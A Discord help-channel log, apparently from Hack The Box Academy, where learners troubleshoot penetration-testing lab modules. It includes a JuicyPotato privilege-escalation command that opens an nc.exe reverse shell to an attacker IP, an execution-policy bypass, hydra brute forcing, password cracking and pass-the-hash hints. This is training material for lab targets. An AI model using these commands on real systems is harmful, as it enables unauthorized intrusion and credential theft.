#modules
They're on the param fuzzing
no, im in parameter fuzzing
which one?
Ffuf module
there are 3 parameter fuzzing sections
i'll die
Here's a wild guess
gotta go take some rest ig
You're meant to fuzz the /admin/admin.php
The module builds off itself
So you're still attacking academy.htb as well
Not the ip, so to speak
yep, make sure you update your vhosts, make sure you're using the command they provide (adjusting for filtering by size or whatever you're filtering by)
one question
It also explicitly tells you which vhost you're attacking
ill be saving admin.academy.htb with the given server ip in my etc/hosts right?
so isn't attacking the ip the same as attacking the url?
huh?
correct, the web server is going to return different results based off of the different vhosts it's hosting
Admin, www, students
Those would all be different vhosts on the same ip
The server handles the requests by seeing which resource you're requesting
Routing is done at the a.b.c level and resources on that vhost are at the /path/to/thing.extension
so hypothetically speaking admin.academy.htb is just admin.ip, more like a subdomain just that its not on the dns servers hence a vhost?
No
It's admin.academy.htb, it's own vhost on the ip
so what am i attacking since 2 hrs 💀 ?
The ip, not the vhost
a single IP address can host multiple websites using virtual hosts (vhosts). when a user visits a website, their browser sends the domain name as part of the request. The web server uses this domain name to determine which website's files to serve. Each website is configured as a virtual host, and the server directs the request to the correct site based on the domain, even though all sites share the same IP.
There's routing based on the configuration to route people to the right thing once they connect.
Your hosts file only tells your system that it exists and to connect to it
There's a server-side config that handles where to send you/what resources to use when you're browsing it
okay another question, so what is subdomain and how is it different from vhost and how is it related to server ip?
So it takes the request to the web server; checks what resource it's requesting [i.e. admin.academy.htb] and uses the configuration associated with that subdomain
Subdomains and vhosts are colloquially interchangeable, but technically different
ohh
domain.com is a domain, sub.domain.com is a subdomain
You don't know just by looking what's a vhost or not
a subdomain may or may not be a vhost running off the same webserver sharing the same ip, but it doesn't have to be
Hi, I need a help with the Firewall and IDS/IPS Evasion - Hard Lab
ohkk
Even the hint didn't work with me to answer:
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
Revisit the text, something about source ports
See what happens when you attack the right thing?
Because the page exists
🥲
Just bc a param fails doesn't mean the page stops existing
wait im a little confused
all 6000 params returned 200, but only one had a different size?
wait so does it work like
if the param exists then the given value will likely cause an error on the server
but if it doesn't exist it'll just return 200 without causing any issue?
No, the size is the key
no i mean because the param exists, its returning some data hence a change in the size
There's a response generated that either 'wrong parameter' or something along those lines, where the right parameter (but wrong value) will say something like 'invalid value'
Thus creating a size difference
It all depends on how the server responds to bad values
okay guess i used the wrong word , i mean wrong value in correct param
It will still throw 200, as that's just saying the page exists
okay i understand now
Which is why you can't solely rely on status code
Sometimes you might be able to dig into a 403, for instance
ohh
Or you might intentionally be trying to throw a 504
Lots of things
Which is one of the sub-lessons within the module that may not be explicitly told to you
Some modules have basically hidden lessons. Like password attacks, patience is key
hmm
@cloud urchin Can you help with evasion module?
i can try, dm me
I'm having issues with the Attacking Enterprise Networks module, specifically the last hoorah in the module to get into MGMT01 with a double pivot. I do everything as specified in the text but it doesn't work; the nmap scan displays port 22 as filtered instead of open and I can't ssh in
the socket just times out
Check the port in your proxychains configuration, additionally, if you are using the workstation try running some of the commands using sudo
how can i start a administrative powershell with the given creds ( they just dont work )
I am having a big problem in the Server Side Attacks skills assessment. I found the SSRF but I can't get it to work
I dont remember for sure but I think there was some other way to abuse ssrf in there something thats not file://
could i dm someone how to get the intended way for the flag - skill assessment of "WEB SERVICE & API ATTACKS"? i ended up doing a code review to get the flag
Ah I see what you’re doing wrong
It has to do with ssti
I’ll never forget that flag
careful about spoiling content
something weird, I run "sudo openvpn" then "curl ifconfig" to get the target ip, but when I nmap I see port 22 is closed, and I can't ssh to it
can someone help me with this?
did you specify the vpn config file ?
yep
I'm working on the final exercise of the File Upload module. Here's what I've got so far: exfiltrated the source code files, identified and bypassed the allow and deny list. Based on the code in upload.php, I know that it's renaming the file before it moves it to the final directory and I think I know where it's being uploaded to, however, when I try to check the file it returns a 'not found'... Obviously I'm missing something... Any advice?
Hey guys is academy slow for u
What do u mean why? Because your request includes that URL
Hey Zer0 I will tell u, but can u please tell me if Academy is being slow for u?
-
You accessed the API in the browser or something, or your burp has the redirect option turned on.
-
When the API saw the error, it redirected u to the error API
-
Im pretty sure that u can inject both APIs, but I cant remember
But if u send the desired API requests to repeater, they wont get redirected.
U can also send them to the organizer and keep them for later
stop reposting stuff that spoils contents of the module, it's over tier 0
here
just don't spoil content
it chose that one because it indicated a potential injection (from what i remember)
Hey everyone. i am working on the windows attacks and defense module and im trying to run the GP-GPPPassword but when i run the command on the target Import-Module .\Get-GPPPassword.ps1 i get an error saying that scripts was disabled on this system
Set-ExecutionPolicy bypass -scope process
oh perfect thank you. was that in a module? i dont remember seeing it.
It might be in a more fundamental module [but I also just used google]
oh. ill keep that in my notes. thanks!
Sometimes your best friend is google :)
yeah. i kinda get tunnel visioned and when i google stuff it gives me the answer to the whole section right away instead of just letting me know how to work past the first bump lol.
Instead google the issue you're facing, not the module you're working on
that is certainly one way of doing it. ill start implementing that method. thank you!
Your issue was generic enough a Google search came up full
i tend to overthink the simple stuff so thats just a part of my downfall at times.
help
With what?
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
When asking for help, don’t forget the module and section.
Did you actually try or are you just copy/pasting looking for the answer?
I tried all users but nothing is correct
Well did you get the event logs from the DC?
The DC is not the 10.129.x.x spawned target. It's another machine on that host's internal network
I'm sure I got it
?
I can't post pictures
Note, the user may not actually exist
So urgent
So if you're just trying usernames that are on the DC that's not gonna help you
Also as sparkling said, module and section name are very helpful
I tried the username from the beginning to the end of the log
wat
And please, without telling us the module and section, we can’t really help. There’s many modules
I'll eat first and then figure out how to post pictures
You need to link your htb account to be able to post images
The DC is given in another question
The given IP is NOT the domain controller
Connect to the domain controller [given in an earlier question] and get the event log from that
Same as you did before [with user10's credentials]
As noted by the question "which user account on the Domain Controller..."
Since all these questions are for the same environment, any info can be relevant
Can you explain further how to use the command line to find the name or IP of the server?
I’m stuck on Using CrackMapExec Finding Secrets and Using Them - Question: “What's the hash of the account named soti?” I’ve dumped all the hashes multiple time from the target machine and there is no account named Soti. I’ve run all of the commands from this module. What am I missing? Or is this a mistake in the module? Can someone give me some help? Thanks!
One of the other questions gives the IP
I solved my problem by using netexec instead of crackmapexec.
Yeah. Netexec is the evolution of crackmap
Cme is deprecated and no longer being maintained
nxc ftw
The go to fix when something ain't working XD
The vpn region controls how the targets (and related internal machines) spawn
Well where
Vpn region != pwnbox region
Should be a section above that
Box above "connect to pwnbox"
You should see it as PwnBox region
Thank you thank you I finally found him
Yep
Download new vpn and respawn lab
You'll need to kill your current vpn connection as well
And run the new one
Wrong, thats not what I was referring to
Make sure no errant spaces before or after
Or just refresh the page
The hash i have starts 49... try changing regions completely from US to EU (or vice versa), see if that changes anything
Hmm not sure what could be going wrong
thats not the parent domain
u can also use -just-dc-user for the user you want
oh i read the wrong thing 
but its probably because of the vss method
you should just use the admin hash you got from the raisechild output
^
Careful revealing content, since it's above t0
Some tools allow you to use the hash, no cracking required
I already deleted
Secretsdump as well iirc, it's been a minute.
--help should give you the list of things you can do
Since I've done it
majority if not all of impacket tools
And I'm relying more on memory than I am notes, no access to my rig atm
Most commands the hash is used with -H
You can also potentially use the tgt hash to just get a ticket for admin and do that fun stuff
if the tool uses impacket -hashes :<hash> is used instead most of the time
wrong domain
Again, careful with spoilers
I understand you're frustrated, but try and be mindful when sharing images that can contain hashes or other sensitive info.
Maybe if you used the right ip
@patent fable
Also stop half-assing your redactions
Ms-paint literally has a draw tool to draw boxes
It's literally just one of the "shapes" in mspaint
this reminds me of that one module where you had to keep attacking the page and eventually the answer showed up 😛
Lucky button
i was so mad at that module lol. i thought i was losing my marbles.
this one was annoying lol.
i was like....alright im going to do blue team stuff for a bit lol
Lol
STUCK
Module: File Transfer
We have access to the machine MS02, and we need to download a file from our Pwnbox machine. Let's see how we can accomplish this using multiple File Download methods.
Where is machine MS02 that I will connect?
I need help with windows priv esc, skills assessment!! part 1, I tried multiple ways, juicypotato and other methods to escalate privileges ??
Module: File Transfers
Microsoft documentation says WebClient is obsolete, instead use HttpClient.
-c flag
Still gets the job done
from what I remember juicypotato is the correct way, you just have to use a different CLSID.
you can go to their github and try their list of CLSID's from top to bottom, I think the first one worked for me If I remember correctly but if it didn't just try others.
i tried those but what i am doing wrong
i dont know really
should i download nc.exe??
jc.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c "{CLSID}" -a "/c C:\Users\Public\nc.exe IP PORT -e cmd.exe"
this is what I am doing
yes, move nc.exe into the target
ok nice
windows doesn't come with nc installed
i tried windows 2016 server ?
PS C:\windows\temp> .\JuicyPotato -l 1337 -p c:\Windows\System32\cmd.exe -t * -c "{87BB326B-E4A0-4de1-94F0-B9F41D0C6059}" -a "/c C:\Users\Public\nc.exe 10.10.14.65 8443 -e cmd.exe"
Testing {87BB326B-E4A0-4de1-94F0-B9F41D0C6059} 1337
if anyone help what is going on
?
try adding a space before /c
ok
still
```
PS C:\windows\temp> .\JuicyPotato -l 1337 -p c:\Windows\System32\cmd.exe -t * -c "{87BB326B-E4A0-4de1-94F0-B9F41D0C6059}" -a "/c C:\Users\Public\nc.exe 10.10.14.65 8443 -e cmd.exe"
Testing {3ad05575-8857-4850-9277-11b85bdb8e09} 1337
COM -> recv failed with error: 10038
PS C:\windows\temp>
```
try another CLSID
Anyone help me in that
which section is this?
it is "Windows File Transfer Methods" in File transfer module.
bro this is part of the explanation, when you finish reading through it you can see a machine at the end that you can spawn and practice on.
Can I use Powershell tool in linux to practice these
or is a dedicated windows environment mandatory?
not sure if pwsh in linux is capable of performing file downloads/uploads like a windows machine as it's limited.
you can try and see yourself
Thanks mate for help.
no problem
Login Brute Forcing
Skills Assessment Part 1
Target : ||83.136.254.158:33116||
What is the password for the basic auth login?
||```bash
$ hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt 83.136.254.158 http-get / -s 33116
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-26 02:58:13
[DATA] max 16 tasks per 1 server, overall 16 tasks, 17 login tries (l:17/p:1), ~2 tries per task
[DATA] attacking http-get://83.136.254.158:33116/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-12-26 02:58:13
```||
I need your help. I think there's no error in my command, but I'm wondering if it's a wordlist problem. The wordlist given for the password doesn't work.
they provide you with usernames.txt and passwords.txt files in the same skills assessment.
use those
your command is not wrong but the wordlists are.
worked , thanks!!
Okay, but as I said, the wordlist password doesn't exist in github.
It exists but on a different branch.
Thanks !!!
I was thinking about that too, I could have looked myself...
Hi folks
I'm stuck on the Using Web Proxies module. To be precise, in the Web Fuzzer part.
I spawn the target, but don't get a valid response as in the tutorial page.
Everything was working fine, but suddenly stopped working. Even the main page where we put IP or commands in the beginning of the module started to return a 404 error.
In Zap Fuzzer task I can't get a 200 OK response in http://SERVER_IP:PORT/skills/
I tried use curl and ffuf but nothing works.
Does someone know how to resolve this kind of behavior?
i've been facing problems with the target servers lately. I ssh into the machines, and they just stop responding. I transfer files like Chisel, the transfer gets stalled. I don't know what's happening. I have tried the PwnBox as well.
the dynamic port forwards don't work too.. although every configuration is correct, nor anything like Chisel helps. Its soo weird
Question: In the web requests module crude API's section , after deploying the target, I don’t think the server IP and port work. When I use curl, it doesn’t respond with any data, even though the header says 200 OK. Is this an issue on my end, or could it be a server issue?
Tips before take the exam??🫶🏻
Pentesting nibbles: initial foothold. I've gotten as far as being able to login to nibbleblog as admin, but the last steps to actually gain a foothold get kind of confusing because my plug-ins work but I can't get a response on netcat, and I'm not exactly sure how to run the python code based on the information given. I'm a beginner, HELP?
Yeahhh this is where I'm stuck. https://academy.hackthebox.com/module/77/section/852
What do you mean?
he's telling you to take breaks during the exam, as this can really help in the process.
Does revision help me a lot ?
I am feeling lost , i do not know
Actually I studied the course totally by myself
Without guide
if there's something that you did not fully grasp, then yes revise it.
if not, then reviewing what you already know won't really help that much.
If i take the exam using pwnbox , is that including the tools?
Not sure which exam you mean, the pwnbox has some things installed by default, but certainly not everything, and none of the windows tools you'll need for CPTS, that's up to you to have them prepared and transfer them. If you've been using it during the course, you'll know what it's missing.
Sounds good 👍🏻
Module: Attacking Common Applications
Section: Attacking Tomcat
Question: Obtain remote code execution on the http://web01.inlanefreight.local:8180 Tomcat instance. Find and submit the contents of tomcat_flag.txt
I have the webshell, i just cannot locate the flag
hey I am stuck at this question: Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>). I can ssh to the target and the target machine does not have hydra nor crackmapexec. I tried to transfer hydra to build it on the target; it requires make to compile and make is not present. I tried to transfer make and found out that make requires make to compile too .....🤧
i searched on forum and found that other people previously have hydra on target machine to do credential stuffing ....
To anyone who is stuck here, try to use find command to search for the flag
???????????
From which module and section is this?
module = password attacks , section = password reuse/default password
You dont need to use hydra or crackmapexec, the section's name might give some hint.
ok i will do that manually
Hello, can anybody help me get past the 2-step code?
This is not hacker for hire
We can’t help you with bypassing 2FA
Can u dm me for a min?
No. I won’t help bypassing 2FA
No, i have another question i got it. That’s illegal.
Then you can dm me 🙂
Unconstrained Delegation - Users
I am not able to get TGT, using the hash, receiving connection but no TGT, any ideas?
Hi, I'm extremely new to this field. I'm really interested in studying more about this field; is there any roadmap for htb, I mean for beginners?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hey a flag in module is not showing where it should be where should i ask for help?
Try respawning the target and double check the location
@storm elk thankyou so much well im not sure which to start off like which module since i do have some basics regarding linux and i do have vm also some basic knowledge on bash,python,java
I was getting the same error.
Someone said to specify the --target flag in the krbrelayx
Is there a way to search modules by the author?
no (but you can suggest /feedback
Hi,
Anyone faced the issue to solve File transfer > Linux file transfer > #2 Question?
I've
connected the ssh, upload the file, unzipped it
tried the following command
md5sum <extractedfile>
🙂 not working the following flagged
I mean the hash
well... the question tells you to use the tool 'hasher' on it
not md5sum
:)
O
I've used hasher before, but got -bash: hasher: command not found
are you running it from the ssh target?
so thought I need to do this with md5sum
:)
hahaha
by far one of the least ambiguous questions on academy 
Hello everyone , I am unable to spawn a reverse shell (in MSSQL section) in the blind sql injection module. Did anyone encountered issue with it ? Or am i missing something (I tried every steps of the solution) ?
Respawning did the trick for me
Hi all, I am looking for a DEDICATED study partner (possibly partners) to study htb together with. I would like the partner to have vip as I will be doing a lot of retired labs and I plan on creating a schedule where we watch ippsecs insane boxes videos once a week, and we do academy another two or three times a week. If this sounds interesting to you and you have VIP and are in EU/US, then please DM me.
This is not the right place for this, kindly send this in #general
ok
Hi everyone, I think there’s a problem in the module Shells&Payloads. I’m at “The Live Engagement.” After I RDP’d into the foothold, I cannot ping 172.16.1.11. According to the question, I should be able to do so. According to the walkthrough I found on the internet, I should be able to do so as well. Has anyone experienced this as well?
respawn the target --> wait a few minutes
change vpn regions
Thank you! I will try this
😃the credentials.txt?
this general tip is good for 99.999% of times you RDP into a machine
so many lost hours/minutes
Do you know if I should use the pwnbox or the vpn? The VPN servers only have US and EU. When I was in Boston it worked just fine but ever since I got to Toronto it’s insanely slow. The ping became 70+ms at best. There’s like US academy 1 through 6, and I don’t know which one would be closer to me. However there’s a lot of pwnbox locations, including Canada, but I feel like it’s still super slow😭I have to wait 1 second before what I typed shows up on the screen. Is this normal?
the delay doesn't mean much ¯\_(ツ)_/¯
70ms is negligible
as long as its consistent delay you're not likely to notice it
it's not the lag that kills, it's the jitters
Thank You!! I can ping 172.16.1.11 now. You’re the GOAT.
Good morning, I'm new, I'm in the JavaScript Deobfuscation module, in the http request part, and I program with Windows, and I'm doing examples like this
curl -s http://SERVER_IP:PORT/ -X POST
and it doesn't take it, it seems like it throws me an error, so I don't know if it's because it works with another system like Linux or it's a mistake of mine directly
i'm assuming you're replacing the SERVER_IP:PORT with the given IP:PORT from "click here to spawn target"
also the question may give you a direct endpoint to curl
Yes, but it doesn't give me the IP:PORT
Target: Click here to spawn target! above the questions
you use that along with the endpoint in the question
also windows is kinda dumb when it comes to certain things; like json requests as well
no no, that's not what I mean, I mean these curl commands, which I put in a terminal and get an error
curl -s http://IP_SERVIDOR:PUERTO/ -X POST
English
Oh, I understand.
sorry, No no, that's not what I'm talking about, I'm talking about these curl commands, which I put in a terminal and I get an error
curl -s http://SERVER_IP:PORT/ -X POST
you replace the IP:PORT in the example with the IP:PORT from the questions
where it says IP:PORT, I have to put IP: and the number
for example if it says above the question; 1.2.3.4:5678 you do curl -s http://1.2.3.4:5678/ -X POST
Does any one pass through this question?
List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.
Any hint about bob's password?
I'll check it out, I'll try, do you do all that with vsc?
?
visual studio code
i know what vsc is, not sure how that relates
read the section carefully
I just use the terminal (linux) or Commandline/Powershell (Windows)
okay question, for the last part where we double pivot in the attacking enterprise networks module, it says "Edit the /etc/proxychains.conf file to use port 9050 that we specified above. If you already have a line in there from earlier, comment it out or replace the port number."
I don't understand what this means, it's not working if I leave it at 9050
I have my ssh to the DMZ (10.129.98.114) tunneling via port 9050 and that is used by the evil-winrm session to the DC (172.16.8.3)
this is so confusing
i'm assuming you did the module reading everything instead of blind ¯\_(ツ)_/¯
Ok, I understand, thank you very much
blind means just spin up the target; extend time as much as possible; get to DA or EA privs
AEN is very good for testing the methodology and notes you Should have gained from doing the CPTS course
but okay how would you do the double pivot then in theory?
use ligolo-ng and use port forwarding techniques
with ligolo it's as simple as setting it to call back to my listener
but with other tools that utilize proxychains i'm not as versed in syntaxes
ligolo-ng is kind of a C2-lite
¯\_(ツ)_/¯
allows you to manage, forward, and mess with connections
-.- FINE
¯\_(ツ)_/¯
i practiced pivoting with ligolo on the double pivot in the pivoting module
I will use ligolo and see about it; proxychains with the meterpreter is really frustrating. the curators should have a second look or elaborate what they mean by adjusting the proxychains.conf file
I take it you're reading the walkthrough?
the walkthroughs are expecting you at this point to know what you're doing
they're good for sanity checks
but i wouldn't rely on them
it's explained pretty well in the pivoting module
if you have a preferred pivoting method just use that
instead of whatever the walkthrough says
though if you've used the walkthrough for this course as a whole, it might be best to go back through the modules and readjust your notes
it's ok to get stuck; the important thing is how you get yourself unstuck
I'm aware that it's using a local port forward on the DC, and a dynamic port forward on the DMZ, but the issue is that the dynamic port forward and the socks_proxy on metasploit are using the same port
utilizing the walkthrough as a crutch is bad because, for instance, on the exam there is no walkthrough
that shouldn't be an issue
well it is because every time you start the auxiliary socks proxy server it just shuts down in metasploit
you can do multipivots pointing to the same home port
you don't need to spin up multiple aux servers in msf
@fathom pendant since you used ligolo-ng before, how is it with double pivoting?
do you have to go through the process of setting up a separate "ligolo" interface on the target? or is there an easier route for this?
honestly with the latest version the creator made a ton of QoL changes
also you don't set up any interfaces on the target
all interfaces are handled on your server
great to know this ! as I only knew the tool from john hammond's video, so Ig I need to start reading some docs.
just make sure to run as sudo
or do the lazy thing chown root:root ligolo; sudo chmod +s ligolo
it seems this is what i'll do lol
because it requires some perms to create and manage interfaces
but there's commands within the tool to create interfaces and such so you don't need to do the whole rigamarole of "sudo ip ..." to create interfaces and manage connections
all documented on their wiki and such
I should really start researching lol, I only took the way john hammond set it up and noted it for the exam.
like i said; i practiced on the pivoting module double pivot section
and it worked fine
for windows, you may need to run Set-ExecutionPolicy bypass -Scope Process in powershell
I'll just practice on AEN as I'm starting it tomorrow.
If it did not have a double pivoting scenario I'll re-practice that in the pivoting module.
imo practicing it on a module that's sole purpose is pivoting will be better
I'm lazy....🫠
it should only take a minute to actually get it
i don't recall much to do with doubles in AEN
I cant log into prtg network monitor with the default credentials.... any help?
i took the screenshot from eyewitness + section and its just not letting me log in...
even on their official wiki they're using the sudo ip .... method, how did you figure the other one?
did you just type help for example and read the help message?
i mean that's a method but you don't need to do all that
there's the interface_create command
Hey i wanna start my journey towards becoming a hacker so can anyone guide me on how I start my journey with hack the box ..?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Probably the docs but there is also tab completion
you owe me $100 for going to spin up pwnbox/target to sanity check (kidding)
as a note: make sure you read the username and passwords right if you're gonna copy/paste
i recommend not copy/pasting and writing yourself to get the idea/muscle memory
ligolo is working so far so good....
It worked! ligolo worked!

Hi guys, Im on bypassing web application protections for sqlmap and stuck on the first question for "case 8" of the module. I have tried what they've taught us in the section, but no luck
I intercepted the traffic with burp (after refreshing the page) and got the id and token
hi I'm doing protected archives section of password attacks module and there's only one question at the end. Anyway, I am following along with the section. I think there's something I'm doing off about this since its not quite working. I already gave rockyou.txt execute and read permissions. Here's what I have while following along aside from that:
```
└──╼ [★]$ cp /usr/share/wordlists/rockyou.txt .
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~]
└──╼ [★]$ john --wordlist=rockyou.txt zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2024-12-26 15:01) 0g/s 10101Kp/s 10101Kc/s 10101KC/s "2parrow"..*7¡Vamos!
Session completed.
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~]
└──╼ [★]$ ls
cacert.der Documents Notes.zip rockyou.txt zip.hash
compressed_ext.txt Downloads Pictures Templates
Desktop Music Public Videos
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~]
└──╼ [★]$ cat compressed_ext.txt
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~]
└──╼ [★]$ john zip.hash --show
0 password hashes cracked, 1 left
```
What do I do about this? why won't it work?
try using the mutated password list
ok
which one is that? is that on the new box?
is it premade or do I have to do mutations?
you have to do the mutations
ok
but all the stuff is given in the resources tab
which list do I mutate?
you reuse that list a bunch
ok I will look in resources
should be a zip file that has password; username; rules
I am stuck in the final assessment of "Web Service & API Attacks". I have already made the SOAP request and the request is also getting hung, which means I am on the right track. Can anybody help me out with the SQLi payload? I have been stuck for the last 4 hours :/
Hi, can anyone pls help me with this 😅
here is the problem
provided value for option '--csrf-token' is a regular expression? [y/N] y
[21:15:59] [INFO] testing connection to the target URL
[21:15:59] [CRITICAL] anti-CSRF token 'csrf-token' can't be found at 'http://83.136.254.158:47407/case8.php'. You can try to rerun by providing a valid value for option '--csrf-url'
okay i think i figured out the problem, which was to specify the token name as "t0ken"
actually no its not that because it keeps giving me the following error
Ok I did all of that and I thought I cracked the password. However, it won't let me view the contents of the zip file. Here's my output:
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~]
└──╼ [★]$ hashcat --force password.list -r custom.rule --stdout | sort -u | grep -vwE '\w{1,11}' > mut_password.list
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~]
└──╼ [★]$ ls
cacert.der custom.rule Documents Music mut_password.list Password-Attacks.zip Pictures rockyou.txt username.list zip.hash
compressed_ext.txt Desktop Downloads mut_pass.txt Notes.zip password.list Public Templates Videos
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~]
└──╼ [★]$ john --wordlist=./mut_password.list zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2024-12-26 15:26) 0g/s 650700p/s 650700c/s 650700C/s ..<SNIP>
Session completed.
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-d7ataiw4xp]─[~]
└──╼ [★]$ john --show zip.hash
0 password hashes cracked, 1 left
what is that grep for? LOL
you did an extra step in the mutated wordlist generation
ok hold on I did that because I had forgotten how to mutate wordlists
ok password cracked. thanks
ok the problem was that I wasnt defining the cookie
I need a hint on Advanced XSS and CSRF Exploitation Skills Assessment, im at last step, ||trying to identify the SQLi point as i already discovered the hidden endpoint, but can't find anything related or any parameter, i only have the error invalid customer ID||. a hint will be much appreciated 🙂
Just leaving in case someone needs a hint for this as the question is poorly worded and I had the same issue. Use the provided wordlists and brute force ssh module at the specified port in your target and later ssh login on that port to get the flag.
attacking ssh is slow
but yeah provided wordlists >>>>>>>> everything else
im on case#10 for sql map and on the bypassing web application filter section. I am struggling a little bit with this question, could someone pls nudge me in the right direction?
It's not SSH, the exercise is completely wrong. Someone needs to have a look at it from the HTB Academy side. The exercise says to follow along by spawning the machine, but the machine that is spun up has no FTP service running, and the mentioned default SSH port that the exercise tries to brute force supports public key authentication, not password based.
yeah you need to specify the given port
since it's a public docker container running a vulnerable thing on a specific port
the default ports on docker containers are locked down tight
this is true of any time htb gives you a public_ip:port
the scope of attack is solely the port on the given IP
Yeah but that should be mentioned in the exercise, not say the below and then go along another tangent, that's just a bad learning experience.
Kick-off
To follow along, start the target system via the question section at the bottom of the page.
it's mentioned in the intro to academy module
how to interact with docker containers/public containers:ports
¯\_(ツ)_/¯
Do you really think people will remember that every time? A hint should be added for a reminder
Also each module is supposed to be standalone
if they had to add a reminder hint for everything the modules would be 10x longer
notes bro.. notes
the intro to academy module teaches you how to interact with academy
which is something you should always bear in mind
Again bad learning experience
while yes, the learning modules are standalone -- interacting with academy is a universal concept across the site
If multiple people are having the same issue, it should give you the hint
only a handful of people are having the issue ¯\_(ツ)_/¯
not enough for them to need a fundamental change
but you can always feel free to provide /feedback
anyone have any idea?
very much not true. do you expect each module to go over basic commands like 'ls' 'whoami' etc? if each module assumed you knew nothing they would be way too big.
Thanks will try that next time
i mean you can do that now, it's a command in the discord
Try the exercise
i've done the exercise, and so has Super i believe
it's also simple logic; if you're given an explicit port -- use the explicit port
if you're unsure how to specify a port with a tool <tool> --help or man <toolname>
Are you guys native english speakers? The exercise says this "Targeting the FTP Server" and mentions the module in the command too "-M ftp" which by logic will make the reader assume there should be an FTP port to try out and also then it shouldn't mention kick off the machine so you can follow along. I get the Intro Module mentions the interaction with specific port but its still a bad experience, that's all I am saying
i just ran a normal request
You think FTP can only run on 21?
yeah I tried sqlmap -u url and also it said something about ID
There is no FTP service running, that's the point
Also I intercepted the request with burp and there was ID at the end of the request
which module/section?
im a bit confused on this
Login Brute Forcing - Web services
oh i just put it in a request file
i see the confusion
Hello, how are you? I need all the help I can get with this question about Attacking Thick Client Applications:
"Perform an analysis of C:\Apps\Restart-OracleService.exe and identify the credentials hidden within its source code. Submit the answer using the format username:password."
I've been stuck for several days, help me please!!!!!!
you're assuming that because the name of the user is ftpuser; that it's meant to attack ftp
You're wrong. There is an FTP service running.
Which port?
ok let me try that
Did you try running the commands given in the module to find the port?
Yeah nmap scan gives no FTP service running as the other user already mentioned too
[22:25:15] [WARNING] if the problem persists please check that the provided target URL is reachable. In case that it is, you can try to rerun with switch '--random-agent' and/or proxy switches ('--proxy', '--proxy-file'...)
[22:25:15] [CRITICAL] unable to connect to the target URL ('Connection refused')
@safe star do u have any idea 😅 :/ ?
and the other command it gives showed nothing?
I tried this
Which other command are you referring to?
sqlmap -r req.txt -T flag10 --dump --batch
the first one.
If you're not seeing a FTP service running maybe change regions, it could be that something is wrong with the box. I was able to do this with the commands given in the section. Honestly didn't even have to scan for the port.
dm the request
alr cool, thanks
I will give that a try too
actually nm
that's not even on the VPN
it's a docker container
i can't spawn it to test for you right now, but if it's really not there you can report it in #1234357888114364508.
i'd wager you're just missing something though.
re-read the section and try the other command it provides to find running services.
careful not to post module content
How was FTP attacked in the section?
your post had it right there, so it looks like it's working
that's not the issue tbh
there's nothing wrong with the target
he posted the results of netstat and found the service running so.. it's working
soooooo i tried to RDP into the system target and it said trust relationship between workstation and primary domain failed....should i contact htb or find a way around?
Try another region
is the web proxies module a little out of date? i don't think the ZAP tutorial matches the current version of ZAP
could just be a me thing tho ;p
you could update ZAP
it works well enough; things are shuffled around a bit
they're saying the version in the examples doesn't match the current version, not the other way around
OH. ima stay outa that
right on, i'll figure it out. ty
sometimes a quick google helps figure it out ¯\_(ツ)_/¯
/nods
i don't generally recall though anything that was like wildly different
just a bit of ui shuffle, for the most part
You login using ssh and then connect to ftp locally with this command, the exercise is badly worded hence if a newbie is trying it they won't understand:
ftp ftp://username:'password'@localhost
you don't need to do all that
just ftp ftpuser@localhost then input password and hit enter
i mean it's completely followable with the examples
That's what I said but you only do that after logging in via ssh so yes you need to do that and not how the exercise is worded
Hence again bad learning experience,
You do realize the command I mentioned is a one-liner, right?
To not be prompted for password
Thanks that worked.
literally from that section
once inside the system
using netstat (within the ssh session)
Okay tried the exercise again, I think I got tunneled vision. I apologize
it happens ¯\_(ツ)_/¯
but just be mindful; if you're having issues re-read to make sure you didn't miss anything -- don't skim
i've missed the obvious text before
Yeah I think it was also because the questions at the end ask for ftpuser hence made my brain think something else while on the exercise you are doing with a different user
you can follow along with the exercise with ftpuser
You can always add it to the #1234357888114364508 if you think others will have trouble with it. If you are doing a path or even just modules, I'm fairly certain there are recommendations prior to starting, i.e., Linux Fundamentals as an example, which would likely provide folks new to this stuff, with a foundation that would likely help with that module, i.e., localhost things.
Glad you got it sorted out.
jeepers. i had to read through some docs just to get Invoke-ShareFinder to work lol
Hello
I'm doing
Attacking Common Applications - Skills Assessment II
When I'm trying to find the vhosts, it's not working for me, can anyone help me?
gobuster vhost -u inlanefreight.local -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 -k -q
cat /etc/hosts | tail -1
10.129.201.90 inlanefreight.local
It is giving me some random founds not the one which is needed
